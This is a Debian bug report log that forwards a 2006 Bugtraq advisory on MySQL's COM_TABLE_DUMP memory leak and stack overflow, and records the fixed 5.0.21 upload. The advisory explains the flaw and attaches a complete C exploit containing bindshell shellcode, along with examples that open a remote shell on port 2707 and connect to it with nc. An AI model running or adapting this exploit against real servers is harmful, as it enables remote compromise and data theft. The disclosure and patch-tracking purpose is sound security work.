Package: mysql-server-5.0; Maintainer for mysql-server-5.0 is (unknown);
Reported by: Christian Hammers <ch@debian.org>
Date: Wed, 3 May 2006 20:48:27 UTC
Severity: grave
Tags: security
Fixed in version mysql-dfsg-5.0/5.0.21-1
Done: Christian Hammers <ch@debian.org>
Bug is archived. No further changes may be made.
View this report as an mbox folder, status mbox, maintainer mbox
Report forwarded to debian-bugs-dist@lists.debian.org:
Bug#365939; Package mysql-server-5.0.
(full text, mbox, link).
Acknowledgement sent to Christian Hammers <ch@debian.org>:
New Bug report received and forwarded.
(full text, mbox, link).
Message #5 received at submit@bugs.debian.org (full text, mbox, reply):
[Message part 1 (text/plain, inline)]
Package: mysql-server-5.0 Severity: grave Justification: user security hole Tags: security Affected: 3.23: unknown \ 4.0: yes } DSA needed 4.1: yes / 5.0: yes, will be fixed by upcoming 5.0.21 release In short: By accessing the socket or port 3306 information can be leaked or arbitrary commands be executed. bye, -christian-
[Message part 2 (message/rfc822, inline)]
206.231.27]) by mail3b2.westend.com (Postfix) with ESMTP id DD9D6121290 for <ch@westend.com>; Tue, 2 May 2006 20:59:54 +0200 (CEST) Received: from outgoing.securityfocus.com by outgoing.securityfocus.com via smtpd (for mail3b2.westend.com [212.117.79.69]) with ESMTP; T= ue, 2 May 2006 11:33:44 -0700 Received: from lists2.securityfocus.com (lists2.securityfocus.com [205.206.= 231.20]) by outgoing3.securityfocus.com (Postfix) with QMQP id 63579237012; Tue, 2 May 2006 09:26:42 -0600 (MDT) Mailing-List: contact bugtraq-help@securityfocus.com; run by ezmlm Precedence: bulk List-Id: <bugtraq.list-id.securityfocus.com> List-Post: <mailto:bugtraq@securityfocus.com> List-Help: <mailto:bugtraq-help@securityfocus.com> List-Unsubscribe: <mailto:bugtraq-unsubscribe@securityfocus.com> List-Subscribe: <mailto:bugtraq-subscribe@securityfocus.com> Received: (qmail 5281 invoked from network); 2 May 2006 13:31:06 -0000 Subject: [bugtraq] MySQL COM_TABLE_DUMP Information Leakage and Arbitrary = command execution. From: Stefano Di Paola <stefano.dipaola@wisec.it> To: Bugtraq <bugtraq@securityfocus.com>, vulnwatch <vulnwatch@vulnwatch.org> Date: Tue, 02 May 2006 15:40:57 +0200 Message-Id: <1146577257.5679.217.camel@first> X-Mailer: Evolution 2.0.1-1mdk=20 X-Spam-Rating: smtp2.aruba.it 1.6.2 0/1000/N Resent-From: ch@westend.com Resent-Date: Wed, 3 May 2006 09:58:45 +0200 Resent-To: ch@lathspell.de Resent-Message-Id: <20060503075845.48929BF86@mail3b1.westend.com> X-Spam-Status: No, hits=3D-97.8 tagged_above=3D-999.0 required=3D5.0 tests= =3DAWL, DCC_CHECK, DNS_FROM_RFC_POST, SPF_HELO_PASS, USER_IN_WHITELIST X-Spam-Level:=20 Mime-Version: 1.0 Content-Type: multipart/mixed; boundary=3D"=3D-/3NrnTJq2pohTLbxWBSW" --=3D-/3NrnTJq2pohTLbxWBSW Content-Type: text/plain Content-Transfer-Encoding: binary ~.oOOo. MySQL COM_TABLE_DUMP .oOOo.~ Information Leakage and Arbitrary command execution=20 =3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D= =3D=3D=3D=3D=3D - Summary: MySQL Server has an information leakage flaw, if a malicious client=20 sends a specific forged packet. Moreover some particular input can crash the server by overwriting the stack, which could lead to remote server compromise. .The information Leakage (<=3D5.0.20, <=3D 4.0.26, <=3D 4.1.18, <=3D 5.1.?)= -=20 Abstract: An authenticated user could read random memory from MySQL server, by taking advantage of a non checked packet length. .The server compromise (<=3D5.0.20 - yes, only 5.x branch - 5.1.x not tested) -=20 Abstract:=20 An authenticated user could remotely execute arbitrary commands by taking advantage of a stack overflow. A Proof of Concept is Attached for all these issues. Tested on: Debian 3.1 - IA32. A little Note: To take advantage of these flaws an attacker should have direct access to MySQL server communication layer (port 3306 or unix socket). But if used in conjuction with some web application flaws=20 (i.e. php code injection) an attacker could use socket programming (i.e. php sockets) to gain access to that layer. =3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D= =3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D= =3D=3D =3D=3D Description - The COM_TABLE_DUMP Information Leakage: Author: Stefano Di Paola Vulnerable: Mysql <=3D 4.0.26, 4.1.18,5.0.20 Type of Vulnerability: Local/Remote - Information Leakage Tested On : Debian 3.1 - IA32. Vendor Status: Notified on April, 25th 2006, Confirmed on April, 26th 2006, New versions released on 2nd May 2006. =20 Fixed: Update to 4.0.27, 4.1.19, 5.0.21, 5.1.10 versions. COM_TABLE_DUMP, as described in MySQL manual is "used by slave server to get master table" A deep look on it shows that MySQL server waits for a forged packet in the following way: packlen ,0x00 ,0x00 ,0x00 ,COM_TABLE_DUMP(0x13)=20 and then: dblen, db_name , tbllen , tblname the extracted code is: sql/sql_parse.cc: line: ~1589=20 case COM_TABLE_DUMP: { char *db, *tbl_name; uint db_len=3D *(uchar*) packet; uint tbl_len=3D *(uchar*) (packet + db_len + 1);=20 =20 statistic_increment(thd->status_var.com_other, &LOCK_status); thd->enable_slow_log=3D opt_log_slow_admin_statements; db=3D thd->alloc(db_len + tbl_len + 2); if (!db) { my_message(ER_OUT_OF_RESOURCES, ER(ER_OUT_OF_RESOURCES), MYF(0)); break; } tbl_name=3D strmake(db, packet + 1, db_len)+1; strmake(tbl_name, packet + db_len + 2, tbl_len); mysql_table_dump(thd, db, tbl_name, -1); break; } Packet should be something like this: 03 00 00 00 13 1 73 2f 1 74 to ask for table 't' on db 's'. But as you can see there is no check for packet, so if we craft a packet like this: 03 00 00 00 13 len 73 we will get an error response=20 like this: z^D#42S02Table 's.^D#42S02Table 's.z^D#42S02Table 's.' doesn't exist'NULL'' doesn't ' doesn't exist depending on len value and memory content. what happens? Here: tbl_len =3D *(uchar*) (packet + db_len + 1); takes some value beyond packet len and then with: strmake(tbl_name, packet + db_len + 2, tbl_len); memory content is copied by tbl_len in tbl_name or until it find a '\0' =20 so when this random name is not found Server will send back an error with some random internal memory content. This, of course can expose parts of queries and or response executed by some previously logged user. The Vendor fix: bugs are fixed in 4.0.27, 4.1.19, 5.0.21, 5.1.10. =3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D= =3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D= =3D=3D - Description - The COM_TABLE_DUMP server compromise: Author: Stefano Di Paola Vulnerable: Mysql <=3D 5.0.20 - yes, only 5.x branch Type of Vulnerability: Local/Remote - Input Validation - Server compromise Tested On : Debian 3.1 - IA32. Vendor Status: Notified on April, 25th 2006, Confirmed on April, 26th 2006, New versions released on 2nd May 2006. Fixed: Update to 4.0.27, 4.1.19, 5.0.21, 5.1.10 versions. With the same previous vulnerability, a malicious (authenticated) user could remotely execute arbitrary commands. Let's see how: On sql/sql_base.cc line: ~1090: TABLE *open_table(THD *thd, TABLE_LIST *table_list, MEM_ROOT *mem_root, bool *refresh, uint flags) { reg1 TABLE *table; char key[MAX_DBKEY_LENGTH]; uint key_length; char *alias=3D table_list->alias; HASH_SEARCH_STATE state; DBUG_ENTER("open_table"); DBUG_PRINT("info", ("table_list:%x thd:%x %s", table_list,thd,table_list->alias)); /* find a unused table in the open table cache */ if (refresh) *refresh=3D0; /* an open table operation needs a lot of the stack space */ if (check_stack_overrun(thd, STACK_MIN_SIZE_FOR_OPEN, (char *)&alias)) return 0; if (thd->killed) DBUG_RETURN(0); key_length=3D (uint) (strmov(strmov(key, table_list->db)+1, table_list->table_name)-key)+1; int4store(key + key_length, thd->server_id); int4store(key + key_length + 4, thd->variables.pseudo_thread_id); By sending a triple of commands, 1. A select with the payload. 2-3. Two COM_TABLE_DUMP packets: 0x03, 0x00, 0x00, 0x00, 0x13, 0x02 , 0x73=20 that is db_len=3D2 and tbl_len is a memory value beyond the packet, the two 'strmov' will, as the third COM_TABLE_DUMP packet is received by the server, overwrite a lot of memory, and a good part of the stack too... The rest is kind of hacking to get the stack be aligned for jumping to the right address.. so i won't go deep in this technique (a lot of gdb helped very much). To get this exploit work we need to know one address: the thread struct address (thd). We should know table_list address too, but i found mine is always 0x1f548 far from thd,so is automatically computed. We need these address, because they are overwrited too, and the shellcode depends by=20 table_list->alias address. Of course there will be more sofisticated approaches, but, hey, this was done as a Poc not as a ready run-n-crack=20 program for kiddies. :) The Vendor fix: bugs are fixed in 4.0.27, 4.1.19, 5.0.21, 5.1.10. You can download them on http://dev.mysql.com/downloads/ =3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D =3D=3DCOM_TABLE_DUMP poc :=20 my_com_table_dump_exploit.c You can compile : gcc -Imysql-5.0.20-src/include/ my_com_table_dump_exploit.c -Lmysql-5.0.20/lib/mysql/ -lmysqlclient -o my_exploit and then my_exploit [-H] [-i] [-t 0xtable-address] [-a 0xthread-address] [[-s socket]|[-h host][-p port]][-x] -H: this Help; -i: Information leakage exploit (shows the content of MySql Server Memory) -x: shows c/s communication output in hexadecimal -t: hexadecimal table_list struct address (by default we try to find it automatically) -a: hexadecimal thread struct address (look at the error log to see something like: thd=3D0x8b1b338) -u: mysql username (anonymous too ;) -p: mysql userpass (if you need it) -s: the socket path if is a unix socket -h: hostname or IP address -P: port (default 3306) Example_1 - Information leakage:=20 my_exploit -s socketpath -u username -i=20 Example_2 - Remote Shell on port 2707:=20 my_exploit -h 127.0.0.1 -u username -a 0x8b1f468 and then on another shell $ nc 127.0.0.1 2707 id uid=3D78(mysql) gid=3D78(mysql) groups=3D78(mysql) ^D $ Regards, Stefano --=20 ......---oOOo--------oOOo---...... Stefano Di Paola Software Engineer Email: stefano.dipaola_at_wisec.it Email: stefano.dipaola1_at_tin.it Web: www.wisec.it .................................. --=3D-/3NrnTJq2pohTLbxWBSW Content-Type: text/x-csrc; charset=3DISO-8859-15; name=3Dmy_com_table_dump_exploit.c Content-Transfer-Encoding: binary Content-Disposition: attachment; filename=3Dmy_com_table_dump_exploit.c /* **************************************************************** =20 April 21.st 2006 =20 my_exploit.c MySql COM_TABLE_DUMP Memory Leak & MySql remote B0f =20 MySql <=3D 5.0.20 =20 MySql COM_TABLE_DUMP Memory Leak=20 =20 MySql <=3D 4.x.x =20 copyright 2006 Stefano Di Paola (stefano.dipaola_at_wisec.it) =20 GPL 2.0 **************************************************************** =20 Disclaimer: In no event shall the author be liable for any damages=20 whatsoever arising out of or in connection with the use=20 or spread of this information.=20 Any use of this information is at the user's own risk. =20 **************************************************************** =20 compile with: gcc -Imysql-5.0.20-src/include/ my_com_table_dump_exploit.c -Lmysql-5.0.= 20/lib/mysql/ -lmysqlclient -o my_exploit Then: my_exploit [-H] [-i] [-t 0xtable-address] [-a 0xthread-address] [[-s sock= et]|[-h host][-p port]][-x] -H: this Help; -i: Information leak exploit (shows the content of MySql Server Memory) -x: shows c/s communication output in hexadecimal -t: hexadecimal table_list struct address (by default we try to find it a= utomatically) -a: hexadecimal thread struct address (look at the error log to see somet= hing like: thd=3D0x8b1b338) -u: mysql username (anonymous too ;) -p: mysql userpass (if you need it) -s: the socket path if is a unix socket -h: hostname or IP address -P: port (default 3306) Example_1 - Memoryleak: my_exploit -s socketpath -u username -i=20 Example_2 - Remote Shell: my_exploit -h 127.0.0.1 -u username -a 0x8b1f468 For memory leak: my_exploit -i [-u user] [-p password] [-s socket|[-h hostname [-P port]]] For the bindshell to port 2707 my_exploit [-t 0xtableaddress] [-a 0xthdaddress] [-u user] [-p password] = [-s socket|[-h hostname [-P port]]] then from another shell: nc 127.0.0.1 2707 id uid=3D78(mysql) gid=3D78(mysql) groups=3D78(mysql) */ #include <stdio.h> #include <mysql.h> #include <unistd.h> // we need to know the thread struct address pointer and the table_list. // these are defaults, change them from command line. int thd =3D 0x8b1b338; int tbl =3D 0x8b3a880; #define USOCK2 "/tmp/mysql.sock" char addr_tdh[4]; char addr_tbl[4]; char addr_ret[4]; // constants to overwrite packet with addresses for table_list thread and o= ur shell. #define TBL_POS 182 #define THD_POS 178 #define RET_POS 174 #define SHL_POS 34 // bindshell spawns a shell with on port 2707 char shcode[] =3D { 0x6a, 0x66, 0x58, 0x6a, 0x01, 0x5b, 0x99, 0x52, 0x53, 0x6a, 0x02, 0x89 //= 12 ,0xe1, 0xcd, 0x80, 0x52, 0x43, 0x68, 0xff, 0x02, 0x0a, 0x93, 0x89, 0xe1 ,0x6a, 0x10, 0x51, 0x50, 0x89, 0xe1, 0x89, 0xc6, 0xb0, 0x66, 0xcd, 0x80 ,0x43, 0x43, 0xb0, 0x66, 0xcd, 0x80, 0x52, 0x56, 0x89, 0xe1, 0x43, 0xb0 ,0x66, 0xcd, 0x80, 0x89, 0xd9, 0x89, 0xc3, 0xb0, 0x3f, 0x49, 0xcd, 0x80 ,0x41, 0xe2, 0xf8, 0x52, 0x68, 0x6e, 0x2f, 0x73, 0x68, 0x68, 0x2f, 0x2f ,0x62, 0x69, 0x89, 0xe3, 0x52, 0x53, 0x89, 0xe1, 0xb0, 0x0b, 0xcd, 0x80 //= 12*7=3D 84 }; int tmp_idx =3D 0; int dump_packet_len =3D 7; char table_dump_packet[] =3D { 0x03, 0x00, 0x00, 0x00, 0x13, 0x02, 0x73 }; int payload_len =3D 371; // header packet + select '1234567890...etc' char query_payload[] =3D { 0x6f, 0x01, 0x00, 0x00, 0x03, 0x73, 0x65, 0x6c, 0x65, 0x63, 0x74, 0x2= 0, 0x27, 0x31, 0x32, 0x33 // 16 Some junk from position 6 ... , 0x34, 0x35, 0x36, 0x37, 0x38, 0x39, 0x30, 0x5f, 0x31, 0x5f, 0x31, 0x3= 2, 0x33, 0x34, 0x35, 0x36 // 32 , 0x37, 0x38, 0x39, 0x30, 0x5f, 0x32, 0x5f, 0x31, 0x32, 0x33, 0x34, 0x3= 5, 0x36, 0x37, 0x38, 0x39 // 48 , 0x30, 0x5f, 0x33, 0x5f, 0x31, 0x32, 0x33, 0x34, 0x35, 0x36, 0x37, 0x3= 8, 0x39, 0x30, 0x5f, 0x34 // 64 , 0x5f, 0x31, 0x32, 0x33, 0x34, 0x35, 0x36, 0x37, 0x38, 0x39, 0x30, 0x5= f, 0x35, 0x5f, 0x31, 0x32 // 72 , 0x33, 0x34, 0x35, 0x36, 0x37, 0x38, 0x39, 0x30, 0x5f, 0x36, 0x5f, 0x3= 1, 0x32, 0x33, 0x34, 0x35 // 88 , 0x36, 0x37, 0x38, 0x39, 0x30, 0x5f, 0x37, 0x5f, 0x31, 0x32, 0x33, 0x3= 4, 0x35, 0x36, 0x37, 0x38 // 94 , 0x39, 0x30, 0x5f, 0x38, 0x5f, 0x31, 0x32, 0x33, 0x34, 0x35, 0x36, 0x3= 7, 0x38, 0x39, 0x30, 0x6a // 112 , 0x0b, 0x58, 0x99, 0x52, 0x68, 0x6e, 0x2f, 0x73, 0x68, 0x68, 0x2f, 0x2= f, 0x62, 0x69, 0x89, 0xe3 // 128 endsh 118 , 0x52, 0x53, 0x89, 0xe1, 0xcd, 0x80, 0x42, 0x43, 0x44, 0x45, 0x46, 0x4= 7, 0x48, 0x49, 0x4c, 0x4d // 144 , 0x4e, 0x4f, 0x50, 0x51, 0x52, 0x53, 0x54, 0x55, 0x56, 0x5a, 0x5f, 0x6= 1, 0x61, 0x62, 0x62, 0x63 // 160 , 0x63, 0x64, 0x64, 0xa0, 0xe9, 0xff, 0xbf, 0xa0, 0xe9, 0xff, 0xbf, 0xa= 0, 0xe9, 0x6c, 0xbf, 0x6d // 176 , 0x6d, 0x6e, 0x6e, 0xff, 0x6f, 0x70, 0x70, 0x71, 0x71, 0x72, 0x72, 0x7= 3, 0x73, 0x74, 0x74, 0x75 // 192 178 , 0x75, 0x76, 0x76, 0x7a, 0x7a, 0x5f, 0x3d, 0x3d, 0x3d, 0x3d, 0x3d, 0x3= d, 0x3d, 0x3d, 0x3d, 0x3d // 208 , 0x3d, 0x3d, 0x3d, 0x3d, 0x3d, 0x3d, 0x3d, 0x3d, 0x3d, 0x3d, 0x3d, 0x3= d, 0x3d, 0x3d, 0x3d, 0x3d // 224 , 0x3d, 0x3d, 0x3d, 0x3d, 0x3d, 0x3d, 0x3d, 0x3d, 0x3d, 0x3d, 0x3d, 0x3= d, 0x3d, 0x3d, 0x3d, 0x3d // 240 , 0x3d, 0x3d, 0x3d, 0x3d, 0x3d, 0x3d, 0x3d, 0x3d, 0x3d, 0x3d, 0x3d, 0x3= d, 0x3d, 0x3d, 0x3d, 0x3d // 256 , 0x3d, 0x3d, 0x3d, 0x3d, 0x3d, 0x3d, 0x3d, 0x3d, 0x3d, 0x3d, 0x3d, 0x3= d, 0x3d, 0x3d, 0x3d, 0x3d // 272 , 0x3d, 0x3d, 0x3d, 0x3d, 0x3d, 0x3d, 0x3d, 0x3d, 0x3d, 0x3d, 0x3d, 0x3= d, 0x3d, 0x3d, 0x3d, 0x3d // 288 , 0x3d, 0x3d, 0x3d, 0x3d, 0x3d, 0x3d, 0x3d, 0x3d, 0x3d, 0x3d, 0x3d, 0x3= d, 0x3d, 0x3d, 0x3d, 0x3d // , 0x3d, 0x3d, 0x3d, 0x3d, 0x3d, 0x3d, 0x3d, 0x3d, 0x3d, 0x3d, 0x3d, 0x3= d, 0x3d, 0x3d, 0x3d, 0x3d // , 0x3d, 0x3d, 0x3d, 0x3d, 0x3d, 0x3d, 0x3d, 0x3d, 0x3d, 0x3d, 0x3d, 0x3= d, 0x3d, 0x3d, 0x3d, 0x3d // , 0x3d, 0x3d, 0x3d, 0x3d, 0x3d, 0x3d, 0x3d, 0x3d, 0x3d, 0x3d, 0x3d, 0x3= d, 0x3d, 0x3d, 0x3d, 0x3d // , 0x3d, 0x3d, 0x27 }; // 16*23+3 =3D 371 static int s =3D 0, c =3D 0; int fd =3D 0; int d =3D 1; int hexdump =3D 0; char buf[65535]; MYSQL *conn; /* pointer to connection handler */ int sendit (char *buf1, int fdest, int dblen) { int len1; int i =3D 0; int ret =3D 0; printf ("%d\n", d); if (d =3D=3D 2) { // let's prepare the query packet=20 int o; int position =3D 14; tmp_idx =3D 3; int ret =3D tbl - 0x106 + 33; for (i =3D 0; i < 32; i +=3D 8) addr_ret[tmp_idx--] =3D (ret >> i) & 0xff; tmp_idx =3D 3; for (i =3D 0; i < 32; i +=3D 8) addr_tdh[tmp_idx--] =3D (thd >> i) & 0xff; tmp_idx =3D 3; for (i =3D 0; i < 32; i +=3D 8) addr_tbl[tmp_idx--] =3D (tbl >> i) & 0xff; printf ("ret %x\n", ret); #if 1 tmp_idx =3D 0; for (o =3D THD_POS; o > THD_POS - 4; o--) query_payload[o] =3D addr_tdh[tmp_idx++]; tmp_idx =3D 0; for (o =3D TBL_POS; o > TBL_POS - 4; o--) query_payload[o] =3D addr_tbl[tmp_idx++]; tmp_idx =3D 0; for (o =3D RET_POS; o > RET_POS - 4; o--) query_payload[o] =3D addr_ret[tmp_idx++]; #else for (; position < payload_len - 12; position +=3D 12) { tmp_idx =3D 0; printf ("p:%d\n", position); for (o =3D position + 4; o > position; o--) query_payload[o] =3D addr_ret[tmp_idx++]; tmp_idx =3D 0; for (o =3D position + 8; o > position + 4; o--) query_payload[o] =3D addr_tdh[tmp_idx++]; tmp_idx =3D 0; for (o =3D position + 12; o > position + 8; o--) query_payload[o] =3D addr_tbl[tmp_idx++]; } #endif tmp_idx =3D 0; for (o =3D SHL_POS; o < SHL_POS + 84; o++) query_payload[o] =3D shcode[tmp_idx++]; printf ("entro\n"); buf1 =3D query_payload; len1 =3D payload_len; } else if (d >=3D 3) { printf ("entro\n"); // prepare table_dump request - PACK_LEN, 0x00, 0x00, 0x00, COM_T= ABLE_DUMP (0x13), DB_NAME_LEN (2) , RANDOM_CHAR (=3D0x73) buf1 =3D table_dump_packet; if (dblen >=3D 0) buf1[5] =3D (char) dblen; printf ("%x", (char) dblen); len1 =3D dump_packet_len; } d++; printf ("\nClient -> Server\n"); if (hexdump) { for (i =3D 0; i < len1; i++) printf (" %.2x%c", (unsigned char) buf1[i], ((i + 1) % 16 ? ' ' : '\n')); printf ("\n"); for (i =3D 0; i < len1; i++) { unsigned char f =3D (unsigned char) buf1[i]; printf (" %.2c%2c", (isprint (f) ? f : '.'), (((i + 1) % 16) ? ' ' : '\n')); } } if (send (fd, buf1, len1, 0) !=3D len1) { perror ("cli: send(buf3)"); exit (1); } fdest =3D fd; memset (buf, 0, 65535); ret =3D recv (fdest, buf, 65535, 0); printf ("\nServer -> Client\n"); if (hexdump) { for (i =3D 0; i < ret; i++) printf (" %.2x%c", (unsigned char) buf[i], ((i + 1) % 16 ? ' ' : '\n')); printf ("\n"); for (i =3D 0; i < ret; i++) { unsigned char f =3D (unsigned char) buf[i]; printf (" %.2c%2c", (isprint (f) ? f : '.'), ((i + 1) % 16 ? ' ' : '\n')); } } else { printf ("\n%s\n", buf + 5); } // printf("\nSending to client\n"); // ret=3D send(c, buf, ret, 0); return 0; } usage () { printf ("\nusage my_exploit [-H] [-i] [-t 0xtable-address] [-a 0xthread-addres= s] [[-s socket]|[-h host][-p port]][-x]\n\n\ -H: this Help;\n\ -i: Information leak exploit (shows the content of MySql Server Memory)\n\ -x: shows c/s communication output in hexadecimal\n\ -t: hexadecimal table_list struct address (by default we try to find it aut= omatically)\n\ -a: hexadecimal thread struct address (look at the error log to see somethi= ng like: thd=3D0x8b1b338)\n\ -u: mysql username (anonymous too ;)\n\ -p: mysql userpass (if you need it)\n\ -s: the socket path if is a unix socket\n\ -h: hostname or IP address\n\ -P: port (default 3306)\n\n\nExample_1 - Memoryleak: my_exploit -h 127.0.0.= 1 -u username -i\n\n\ Example_2 - Remote Shell on port 2707: my_exploit -h 127.0.0.1 -u username = -a 0x8b1b338 -t 0x8b3a880\n\n\ "); } int main (int argc, char *argv[]) { int fdest =3D 0; int port =3D 3306; int shell =3D 1; int force_table =3D 0; char buf1[65535]; char *socket; char *user =3D NULL; char *pass =3D NULL; char *host =3D NULL; socket =3D strdup ("/tmp/mysql2.sock"); opterr =3D 0; while ((c =3D getopt (argc, argv, "s:t:a:P:Hh:u:p:ix")) !=3D -1) switch (c) { case 's': socket =3D (char *) optarg; break; case 't': force_table =3D 1; tbl =3D (int) strtol (optarg, NULL, 16); //tbl=3Datoi( optarg ); break; case 'a': thd =3D (int) strtol (optarg, NULL, 16); break; case 'u': user =3D (char *) optarg; break; case 'p': pass =3D (char *) optarg; break; case 'P': port =3D atoi (optarg); break; case 'h': host =3D (char *) optarg; break; case 'i': shell =3D 0; break; case 'x': hexdump =3D 1; break; case 'H': usage (); return 1; default: break; } if (!force_table) tbl =3D thd + 0x1f548; conn =3D mysql_init (NULL); int ret =3D mysql_real_connect (conn, /* pointer to connection handler */ host, /* host to connect to */ user, /* user name */ pass, /* password */ NULL, /* database to use */ 0, /* port (use default) */ socket, /* socket (use default) */ 0); /* flags (none) */ if (!ret) { fprintf (stderr, "Can't connect, error : %s\n", mysql_error (conn)); return 1; } printf ("using table_list:%x thread:%x\n", tbl, thd); fd =3D conn->net.fd; if (shell) { d =3D 2; sendit (buf1, fdest, -1); d =3D 3; sendit (buf1, fdest, -1); d =3D 3; sendit (buf1, fdest, -1); } else { int l; d =3D 3; for (l =3D 0; l < 256; l++) { sendit (buf1, fdest, l); } } mysql_close (conn); exit (0); } --=3D-/3NrnTJq2pohTLbxWBSW--
Reply sent to Christian Hammers <ch@debian.org>:
You have taken responsibility.
(full text, mbox, link).
Notification sent to Christian Hammers <ch@debian.org>:
Bug acknowledged by developer.
(full text, mbox, link).
Message #10 received at 365939-close@bugs.debian.org (full text, mbox, reply):
Source: mysql-dfsg-5.0
Source-Version: 5.0.21-1
We believe that the bug you reported is fixed in the latest version of
mysql-dfsg-5.0, which is due to be installed in the Debian FTP archive:
libmysqlclient15-dev_5.0.21-1_amd64.deb
to pool/main/m/mysql-dfsg-5.0/libmysqlclient15-dev_5.0.21-1_amd64.deb
libmysqlclient15off_5.0.21-1_amd64.deb
to pool/main/m/mysql-dfsg-5.0/libmysqlclient15off_5.0.21-1_amd64.deb
mysql-client-5.0_5.0.21-1_amd64.deb
to pool/main/m/mysql-dfsg-5.0/mysql-client-5.0_5.0.21-1_amd64.deb
mysql-client_5.0.21-1_all.deb
to pool/main/m/mysql-dfsg-5.0/mysql-client_5.0.21-1_all.deb
mysql-common_5.0.21-1_all.deb
to pool/main/m/mysql-dfsg-5.0/mysql-common_5.0.21-1_all.deb
mysql-dfsg-5.0_5.0.21-1.diff.gz
to pool/main/m/mysql-dfsg-5.0/mysql-dfsg-5.0_5.0.21-1.diff.gz
mysql-dfsg-5.0_5.0.21-1.dsc
to pool/main/m/mysql-dfsg-5.0/mysql-dfsg-5.0_5.0.21-1.dsc
mysql-dfsg-5.0_5.0.21.orig.tar.gz
to pool/main/m/mysql-dfsg-5.0/mysql-dfsg-5.0_5.0.21.orig.tar.gz
mysql-server-5.0_5.0.21-1_amd64.deb
to pool/main/m/mysql-dfsg-5.0/mysql-server-5.0_5.0.21-1_amd64.deb
mysql-server_5.0.21-1_all.deb
to pool/main/m/mysql-dfsg-5.0/mysql-server_5.0.21-1_all.deb
A summary of the changes between this version and the previous one is
attached.
Thank you for reporting the bug, which will now be closed. If you
have further comments please address them to 365939@bugs.debian.org,
and the maintainer will reopen the bug report if appropriate.
Debian distribution maintenance software
pp.
Christian Hammers <ch@debian.org> (supplier of updated mysql-dfsg-5.0 package)
(This message was generated automatically at their request; if you
believe that there is a problem with it please contact the archive
administrators by mailing ftpmaster@debian.org)
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1
Format: 1.7
Date: Sat, 29 Apr 2006 04:31:27 +0200
Source: mysql-dfsg-5.0
Binary: libmysqlclient15-dev mysql-client mysql-client-5.0 mysql-server mysql-server-5.0 mysql-common libmysqlclient15off
Architecture: source all amd64
Version: 5.0.21-1
Distribution: unstable
Urgency: high
Maintainer: Christian Hammers <ch@debian.org>
Changed-By: Christian Hammers <ch@debian.org>
Description:
libmysqlclient15-dev - mysql database development files
libmysqlclient15off - mysql database client library
mysql-client - mysql database client (current version)
mysql-client-5.0 - mysql database client binaries
mysql-common - mysql database common files (e.g. /etc/mysql/my.cnf)
mysql-server - mysql database server (current version)
mysql-server-5.0 - mysql database server binaries
Closes: 365460 365939 365939
Changes:
mysql-dfsg-5.0 (5.0.21-1) unstable; urgency=high
.
* SECURITY: New upstream release with some security relevant bugfixes:
* "Anonymous Login Handshake - Information Leakage"
* "COM_TABLE_DUMP Information Leakage and Arbitrary command execution"
Closes: #365939, #365939
* Added diskfree check to the init script (thanks to Tim Baverstock).
Closes: #365460
* First amd64 upload!
Files:
766a133a17524d2d5e85c032bf254cd9 1090 misc optional mysql-dfsg-5.0_5.0.21-1.dsc
d97897e52dcf48a722f04fe576b912a9 18451827 misc optional mysql-dfsg-5.0_5.0.21.orig.tar.gz
edfd88817103491fad85f589ea7c1595 123747 misc optional mysql-dfsg-5.0_5.0.21-1.diff.gz
552eebbaab0d2df74d445926db1e1b26 38036 misc optional mysql-common_5.0.21-1_all.deb
c4538e52611a98df116d8aa676344b8f 35512 misc optional mysql-server_5.0.21-1_all.deb
3925c64c94fe41fe1f62b8963adb5072 35508 misc optional mysql-client_5.0.21-1_all.deb
9e9bfc8e4f60e543c992756a5e2031cb 1420250 libs optional libmysqlclient15off_5.0.21-1_amd64.deb
bcc9480bdc6dd0b45a6af0f894c7796a 6730548 libdevel optional libmysqlclient15-dev_5.0.21-1_amd64.deb
0be20c10979688f3596438341aeee3e5 6890630 misc optional mysql-client-5.0_5.0.21-1_amd64.deb
893518cdf66d10d4c85aaf618dd6821d 22487868 misc optional mysql-server-5.0_5.0.21-1_amd64.deb
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.3 (GNU/Linux)
iEYEARECAAYFAkRZQykACgkQkR9K5oahGOYTIQCeLBVc0AdZeSqMuPrazhQl0HIN
KeEAn0SFEN9Yc3F8e8MwlBIvLO7oi+5q
=sn30
-----END PGP SIGNATURE-----
Bug 365939 cloned as bugs 366048, 366049.
Request was from Christian Hammers <ch@debian.org>
to control@bugs.debian.org.
(full text, mbox, link).
Bug archived.
Request was from Debbugs Internal Request <owner@bugs.debian.org>
to internal_control@bugs.debian.org.
(Mon, 25 Jun 2007 07:31:55 GMT) (full text, mbox, link).
Send a report that this bug log contains spam.
Debbugs is free software and licensed under the terms of the GNU General Public License version 2. The current version can be obtained from https://bugs.debian.org/debbugs-source/.
Copyright © 1999 Darren O. Benham, 1997,2003 nCipher Corporation Ltd, 1994-97 Ian Jackson, 2005-2017 Don Armstrong, and many other contributors.